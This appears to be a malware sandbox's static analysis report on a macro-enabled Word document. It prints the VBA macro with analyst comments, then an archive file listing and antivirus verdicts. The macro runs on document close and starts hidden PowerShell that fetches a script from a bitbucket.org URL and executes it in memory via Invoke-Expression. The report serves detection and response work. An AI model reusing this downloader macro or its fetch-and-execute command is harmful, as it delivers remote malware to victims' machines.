Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' RunCommand: downloader stage of the macro.
' Builds a PowerShell pipeline that fetches a remote script and executes the
' response in memory, then starts powershell.exe through Shell with a hidden
' window. Nothing in this procedure writes the fetched script to disk, so the
' artefacts to look for are the process command line and the outbound request.
' Detection notes for responders:
'   - an Office host process (Word, given the ThisDocument module) spawning
'     powershell.exe;
'   - "-ExecutionPolicy Bypass" together with "Invoke-Expression" on the
'     command line;
'   - PowerShell script-block logging, if enabled, should record the fetched
'     content when it is evaluated.
Sub RunCommand()
    Dim script As String
    ' Receives the value returned by Shell; never read afterwards.
    Dim shellResult As Variant
    ' Invoke-RestMethod retrieves the body of init.ps1; the pipe to Invoke-Expression
    ' evaluates that body as PowerShell code. The URL path contains a 40-hex-character
    ' segment, presumably a pinned commit id, so the content served should be fixed
    ' unless the repository is removed or rewritten -- confirm against the host.
    script = "Invoke-RestMethod -Uri 'https://bitbucket.org/bypass_workers/main/raw/c3291e02cef4015bdeb6d1e8d6bb23f56afa7afe/init.ps1' | Invoke-Expression"
    ' -NoProfile skips the user's profile scripts; -ExecutionPolicy Bypass sets the
    ' policy to Bypass for this process only (execution policy is not a security
    ' boundary and does not stop -Command input in any case). vbHide starts the
    ' process with a hidden window, so the user sees no console.
    shellResult = Shell("powershell.exe -NoProfile -ExecutionPolicy Bypass -Command """ & script & """", vbHide)
End Sub

' Document_Close: Word document event handler in the ThisDocument module.
' Word raises this event when the document is closed, so the download-and-run
' step in RunCommand fires on close rather than on open. Analysis note: a
' detonation that opens the file but never closes it may not observe the
' PowerShell launch; dynamic analysis should include closing the document.
Private Sub Document_Close()
    ' Only action of the handler: trigger the downloader.
    RunCommand
End Sub


                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' RunCommand (deobfuscated view): same text as the original listing, i.e. the
' macro carried no string obfuscation for the deobfuscator to undo.
' Assembles a PowerShell command that downloads a remote script and evaluates
' it in memory, then launches powershell.exe hidden via Shell.
' Indicators visible here: the bitbucket.org raw URL and the powershell.exe
' command-line flags; both are suitable for hunting in proxy and process
' creation logs.
Sub RunCommand()
    Dim script As String
    ' Holds the return value of Shell; not used after assignment.
    Dim shellResult As Variant
    ' Fetch init.ps1 with Invoke-RestMethod and pipe the response body to
    ' Invoke-Expression, which runs it as code in the PowerShell process.
    script = "Invoke-RestMethod -Uri 'https://bitbucket.org/bypass_workers/main/raw/c3291e02cef4015bdeb6d1e8d6bb23f56afa7afe/init.ps1' | Invoke-Expression"
    ' Flags: -NoProfile (no profile scripts loaded), -ExecutionPolicy Bypass
    ' (process-scoped policy override), -Command (inline command string).
    ' vbHide: the spawned process window is hidden from the user.
    shellResult = Shell("powershell.exe -NoProfile -ExecutionPolicy Bypass -Command """ & script & """", vbHide)
End Sub

' Document_Close: event procedure Word runs when the document is closed.
' It is the macro's only trigger in this listing; no open-time handler is
' present, so execution is deferred until the user closes the file.
Private Sub Document_Close()
    ' Hand off to the downloader routine.
    RunCommand
End Sub


                                    
[Content_Types].xml
%[ILn7
d!4I>5yQ*'
TMsL2d
_rels/.rels
word/document.xml
word/_rels/document.xml.rels
,r$M.k4
word/footnotes.xml
<m0Oq)8
word/endnotes.xml
A\#EnA
Exg(tu
word/vbaProject.bin
@?0@lKD;
%~j&wKg
j0ZH[:
V2YgMZ
{,{w:n
CG'3Y+
r^=no#
>Z,*{h(
G]owXMA
t_/d%)Q
M3h-x6~
oZ|39m
[YcKj4
word/vbaProjectSignature.bin
}6U,Tln
nN:L/,+
umG9!Q
TQ_}d1o
XR `PS
D{6[0g
>M}4P+X
8LR%)G+
4v7e@i4lr
|Sc{JG
word/vbaProjectSignatureAgile.bin
H1 EA@P
Y)?9x/
J,l9''
(d<XrZ9}a
yGT<X_
>p9&A1"(APzY]
'qG?p^
>\:dlv
5MA\gm-
word/vbaProjectSignatureV3.bin
#@OE{!
)#/CrQ
78PU3{w
~cc~]3
'")hl0
)2UT9b
IQO6HQ
-L_:*`
H'#gR/{o
}[pn6dZ
d$(.b#WK
[.CQGq
word/theme/theme1.xml
!Ic@Y5
1S{}8D
.kuV@EqU
@<QrF,
!\n>g_;
docProps/thumbnail.emf
Shu?x;
i"jmZ7u
gdSO[N
word/_rels/vbaProject.bin.rels
word/vbaData.xml
word/settings.xml
d_2M9?
word/_rels/settings.xml.rels
-]R5/D]
customXml/item1.xml
l^4G94
customXml/itemProps1.xml
.5{{}NK
customXml/item2.xml
customXml/itemProps2.xml
customXml/item3.xml
4pbuFW
(d7h/.P
E!>\:N
V=I$U`
3L=4jA
2 rKCL
customXml/itemProps3.xml
k'wh]c
word/styles.xml
H%0W~&
iD|:bQ@
'Tho#T
ny"V/[o5
2Q-'U*T
Z*Y[VK%
+|3_\lqR
U}D-b{y
word/webSettings.xml
]?cv0$G
word/fontTable.xml
CNF~jL>
yq$qpR"
docProps/core.xml
Lq!79z]-
docProps/app.xml
j%aI.`
!RU%8l
docProps/custom.xml
,A@EyH
customXml/_rels/item1.xml.rels
customXml/_rels/item2.xml.rels
customXml/_rels/item3.xml.rels
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/footnotes.xmlPK
word/endnotes.xmlPK
word/vbaProject.binPK
word/vbaProjectSignature.binPK
word/vbaProjectSignatureAgile.binPK
word/vbaProjectSignatureV3.binPK
word/theme/theme1.xmlPK
docProps/thumbnail.emfPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/_rels/settings.xml.relsPK
customXml/item1.xmlPK
customXml/itemProps1.xmlPK
customXml/item2.xmlPK
customXml/itemProps2.xmlPK
customXml/item3.xmlPK
customXml/itemProps3.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
docProps/custom.xmlPK
customXml/_rels/item1.xml.relsPK
customXml/_rels/item2.xml.relsPK
customXml/_rels/item3.xml.relsPK
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Malicious (score: 99)
CMC Clean
CAT-QuickHeal Clean
Skyhigh Artemis!Trojan
ALYac Clean
Malwarebytes Clean
Sangfor Trojan.Macro.PowerShell.se
K7AntiVirus Clean
BitDefender Clean
K7GW Clean
Cybereason Clean
BitDefenderTheta Clean
VirIT W97M/Downloader.AE
Symantec ISB.Downloader!gen48
Elastic malicious (high confidence)
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Trustlook Clean
ClamAV Doc.Downloader.Powershell-10002004-0
Kaspersky UDS:DangerousObject.Multi.Generic
Alibaba Clean
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot Clean
MicroWorld-eScan Clean
Tencent Office.Trojan-Dropper.Sdrop.Kzfl
Sophos Clean
F-Secure Heuristic.HEUR/Macro.Agent
DrWeb Clean
VIPRE Clean
FireEye Clean
Emsisoft Clean
Jiangmin Clean
Varist Clean
Avira HEUR/Macro.Agent
MAX Clean
Antiy-AVL Trojan[Downloader]/MSOffice.Agent
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Dropper.MSOffice.SDrop.gen
Avast-Mobile Clean
Google Detected.Heuristic.Script
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Suspicious/WOX.XSR.Gen
Zoner Probably Heur.W97ShellS
Rising Heur.Macro.powershell.a (CLASSIC)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
CrowdStrike Clean
alibabacloud Trojan:MSOffice/Macro.Akgpp
No IRMA results available.